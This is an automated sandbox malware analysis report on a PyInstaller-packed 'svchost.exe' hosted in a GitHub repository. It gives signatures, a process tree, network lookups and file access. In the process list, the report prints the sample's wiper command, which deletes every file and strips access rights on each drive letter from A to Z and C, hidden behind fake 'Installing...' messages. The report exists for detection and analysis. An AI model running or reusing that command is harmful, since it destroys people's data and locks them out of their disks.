Malware Analysis Report

2025-05-05 21:21

Sample ID 240510-r166daec25
Target https://github.com/erfan4lx/Windows-Virus/blob/master/svchost.exe
Tags
pyinstaller spyware stealer
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

Threat Level: Likely malicious

The file https://github.com/erfan4lx/Windows-Virus/blob/master/svchost.exe was found to be: Likely malicious.

Malicious Activity Summary

pyinstaller spyware stealer

Downloads MZ/PE file

Loads dropped DLL

Executes dropped EXE

Reads user/profile data of web browsers

Enumerates connected drives

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Detects Pyinstaller

Views/modifies file attributes

Suspicious use of SendNotifyMessage

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Enumerates system info in registry

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Modifies data under HKEY_USERS

NTFS ADS

Delays execution with timeout.exe

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-10 14:40

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-10 14:40

Reported

2024-05-10 14:43

Platform

win10v2004-20240426-en

Max time kernel

173s

Max time network

162s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/erfan4lx/Windows-Virus/blob/master/svchost.exe

Signatures

Downloads MZ/PE file

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\svchost.exe N/A
N/A N/A C:\Users\Admin\Downloads\svchost.exe N/A

Reads user/profile data of web browsers

spyware stealer

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\P: C:\Windows\system32\cacls.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\cacls.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\cacls.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\cacls.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\cacls.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\cacls.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\cacls.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\cacls.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\cacls.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\cacls.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\cacls.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\cacls.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\cacls.exe N/A
File opened (read-only) \??\D: C:\Windows\system32\cacls.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\cacls.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\cacls.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\cacls.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\cacls.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\cacls.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\cacls.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\cacls.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\cacls.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\cacls.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\cacls.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\cacls.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\Recovery\ReAgent.xml C:\Windows\system32\bootim.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jre-1.8\bin\server\classes.jsa C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa C:\Windows\system32\cmd.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Globalization\ICU\icudtl.dat C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\setupact.log C:\Windows\system32\bootim.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log C:\Windows\system32\bootim.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml C:\Windows\system32\bootim.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml C:\Windows\system32\bootim.exe N/A

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History C:\Windows\system32\LogonUI.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "237" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" C:\Windows\system32\LogonUI.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 207892.crdownload:SmartScreen C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\bootim.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\bootim.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
(36 identical entries, all from msedge.exe)

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
(24 identical entries, all from msedge.exe)

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\mmc.exe N/A
N/A N/A C:\Windows\system32\LogonUI.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4044 wrote to memory of 4064 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (2 identical entries)
PID 4044 wrote to memory of 3648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (40 identical entries)
PID 4044 wrote to memory of 3752 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (2 identical entries)
PID 4044 wrote to memory of 2084 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (20 identical entries)
(64 entries in total; every writer and target is msedge.exe, i.e. the browser's own child-process setup)

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/erfan4lx/Windows-Virus/blob/master/svchost.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd6d1046f8,0x7ffd6d104708,0x7ffd6d104718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2056 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2436 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2644 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5244 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5244 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5468 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5508 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6060 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5892 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5336 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6208 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5496 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6352 /prefetch:1

C:\Users\Admin\Downloads\svchost.exe

"C:\Users\Admin\Downloads\svchost.exe"

C:\Users\Admin\Downloads\svchost.exe

"C:\Users\Admin\Downloads\svchost.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s svchost.exe

C:\Windows\system32\attrib.exe

attrib +h +s svchost.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c timeout 1 & echo Installing... & echo Installing... & echo Installing... & echo Installing... & echo Installing... & echo Installing... & del A:\*.* /f /s /q & cacls A:\ /e /p everyone:n & del B:\*.* /f /s /q & cacls B:\ /e /p everyone:n & del D:\*.* /f /s /q & cacls D:\ /e /p everyone:n & del E:\*.* /f /s /q & cacls E:\ /e /p everyone:n & del F:\*.* /f /s /q & cacls F:\ /e /p everyone:n & del G:\*.* /f /s /q & cacls G:\ /e /p everyone:n & del H:\*.* /f /s /q & cacls H:\ /e /p everyone:n & del I:\*.* /f /s /q & cacls I:\ /e /p everyone:n & del J:\*.* /f /s /q & cacls J:\ /e /p everyone:n & del K:\*.* /f /s /q & cacls K:\ /e /p everyone:n & del L:\*.* /f /s /q & cacls L:\ /e /p everyone:n & del M:\*.* /f /s /q & cacls M:\ /e /p everyone:n & del N:\*.* /f /s /q & cacls N:\ /e /p everyone:n & del O:\*.* /f /s /q & cacls O:\ /e /p everyone:n & del P:\*.* /f /s /q & cacls P:\ /e /p everyone:n & del Q:\*.* /f /s /q & cacls Q:\ /e /p everyone:n & del R:\*.* /f /s /q & cacls R:\ /e /p everyone:n & del S:\*.* /f /s /q & cacls S:\ /e /p everyone:n & del T:\*.* /f /s /q & cacls T:\ /e /p everyone:n & del U:\*.* /f /s /q & cacls U:\ /e /p everyone:n & del V:\*.* /f /s /q & cacls V:\ /e /p everyone:n & del W:\*.* /f /s /q & cacls W:\ /e /p everyone:n & del X:\*.* /f /s /q & cacls X:\ /e /p everyone:n & del Y:\*.* /f /s /q & cacls Y:\ /e /p everyone:n & del Z:\*.* /f /s /q & cacls Z:\ /e /p everyone:n & del C:\*.* /f /s /q & cacls C:\ /e /p everyone:n

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\cacls.exe

cacls A:\ /e /p everyone:n

C:\Windows\system32\cacls.exe

cacls B:\ /e /p everyone:n

C:\Windows\system32\cacls.exe

cacls D:\ /e /p everyone:n

C:\Windows\system32\cacls.exe

cacls E:\ /e /p everyone:n

C:\Windows\system32\cacls.exe

cacls F:\ /e /p everyone:n

C:\Windows\system32\cacls.exe

cacls G:\ /e /p everyone:n

C:\Windows\system32\cacls.exe

cacls H:\ /e /p everyone:n

C:\Windows\system32\cacls.exe

cacls I:\ /e /p everyone:n

C:\Windows\system32\cacls.exe

cacls J:\ /e /p everyone:n

C:\Windows\system32\cacls.exe

cacls K:\ /e /p everyone:n

C:\Windows\system32\cacls.exe

cacls L:\ /e /p everyone:n

C:\Windows\system32\cacls.exe

cacls M:\ /e /p everyone:n

C:\Windows\system32\cacls.exe

cacls N:\ /e /p everyone:n

C:\Windows\system32\cacls.exe

cacls O:\ /e /p everyone:n

C:\Windows\system32\cacls.exe

cacls P:\ /e /p everyone:n

C:\Windows\system32\cacls.exe

cacls Q:\ /e /p everyone:n

C:\Windows\system32\cacls.exe

cacls R:\ /e /p everyone:n

C:\Windows\system32\cacls.exe

cacls S:\ /e /p everyone:n

C:\Windows\system32\cacls.exe

cacls T:\ /e /p everyone:n

C:\Windows\system32\cacls.exe

cacls U:\ /e /p everyone:n

C:\Windows\system32\cacls.exe

cacls V:\ /e /p everyone:n

C:\Windows\system32\cacls.exe

cacls W:\ /e /p everyone:n

C:\Windows\system32\cacls.exe

cacls X:\ /e /p everyone:n

C:\Windows\system32\cacls.exe

cacls Y:\ /e /p everyone:n

C:\Windows\system32\cacls.exe

cacls Z:\ /e /p everyone:n

C:\Windows\system32\cacls.exe

cacls C:\ /e /p everyone:n

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault9eb942a4h4d64h4970h8903h042002736874

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd6d1046f8,0x7ffd6d104708,0x7ffd6d104718

C:\Windows\SysWOW64\DllHost.exe

C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}

C:\Windows\system32\mmc.exe

"C:\Windows\system32\mmc.exe" C:\Windows\system32\devmgmt.msc

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x4 /state0:0xa38cf855 /state1:0x41c64e6d

C:\Windows\system32\bootim.exe

bootim.exe /startpage:1

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 avatars.githubusercontent.com udp
US 8.8.8.8:53 github.githubassets.com udp
US 185.199.109.133:443 avatars.githubusercontent.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 8.8.8.8:53 user-images.githubusercontent.com udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 154.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 collector.github.com udp
US 140.82.113.22:443 collector.github.com tcp
US 140.82.113.22:443 collector.github.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 8.8.8.8:53 api.github.com udp
GB 20.26.156.210:443 api.github.com tcp
US 8.8.8.8:53 22.113.82.140.in-addr.arpa udp
US 8.8.8.8:53 210.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
BE 88.221.83.217:443 www.bing.com tcp
US 8.8.8.8:53 217.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 45.19.74.20.in-addr.arpa udp
BE 88.221.83.217:443 www.bing.com tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 142.53.16.96.in-addr.arpa udp
GB 20.26.156.210:443 api.github.com tcp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 201.201.50.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

\??\pipe\LOCAL\crashpad_4044_BKDORYCLJEYWVFHP

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

C:\Users\Admin\Downloads\Unconfirmed 207892.crdownload

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

C:\Users\Admin\AppData\Local\Temp\_MEI35562\svchost.exe.manifest

C:\Users\Admin\AppData\Local\Temp\_MEI35562\python27.dll

C:\Users\Admin\AppData\Local\Temp\_MEI35~1\win32process.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI35~1\pywintypes27.dll

C:\Users\Admin\AppData\Local\Temp\_MEI35562\win32gui.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI35~1\_socket.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI35~1\_ssl.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI35~1\bz2.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI35~1\psutil._psutil_windows.pyd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\edge_shutdown_ms.txt

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Browser

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History Provider Cache

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Favicons

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000007

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000006

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000001

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\WebAssistDatabase

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Visited Links

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

C:\Windows\System32\Recovery\ReAgent.xml
